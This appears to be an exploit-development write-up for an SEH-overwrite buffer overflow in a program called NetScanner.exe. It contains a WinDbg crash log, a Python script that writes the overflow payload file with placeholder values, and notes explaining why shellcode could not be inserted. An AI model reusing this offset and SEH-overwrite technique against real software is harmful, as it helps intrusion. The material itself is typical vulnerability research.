[-] string : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌÌÌÌBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[-] crash info
(2d0.878): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=772571cd esi=00000000 edi=00000000
eip=42424242 esp=0012edd8 ebp=0012edf8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
42424242 ?? ???
0:000> !exchain
0012edec: ntdll!ExecuteHandler2+3a (772571cd)
0012f534: 42424242
Invalid exception stack at cccccccc
0:000> d 12f534
0012f534 cc cc cc cc 42 42 42 42-43 43 43 43 43 43 43 43 ....BBBBCCCCCCCC
0012f544 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f554 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f564 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f574 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f584 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f594 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5a4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0:000> d
0012f5b4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5c4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5d4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5e4 43 43 43 00 95 b4 31 74-84 f6 12 00 00 00 00 00 CCC...1t........
0012f5f4 0a 80 00 00 ea 01 24 00-00 00 00 00 00 00 00 00 ......$.........
0012f604 ab 00 0a e7 34 f6 12 00-e7 c4 06 77 ea 01 24 00 ....4......w..$.
0012f614 15 02 00 00 00 00 00 00-00 00 00 00 15 02 00 00 ................
0012f624 cd ab ba dc 00 00 00 00-84 f6 12 00 15 02 00 00 ................
'''
import struct
junk1 = "A" * 76
nSEH = "\xcc\xcc\xcc\xcc"
SEH = "BBBB"
shell = "C" * 300
payload = junk1 + nSEH + SEH + shell
with open("netEx.txt","wb") as f :
f.write(payload)
print payload
"""
Exploit problem
1. Input string(value) was replaced '0x3f' in the memory. then shellcode should be encoded to alpha_mixed.
Buffer size was 171 bytes. but, encoded shellcode size was over 600 bytes.
2. Null byte cannot be inserted into Input field. so we can't use SEH pointer in a range of NetScanner.exe address (0x00400000~0x008c3000)
3. payload was consisted of 'junk - shellcode - nSEH ptr - SEH ptr'. but this step was fail. because junk buffer size was 76 bytes.
Can't insert shellcode
"""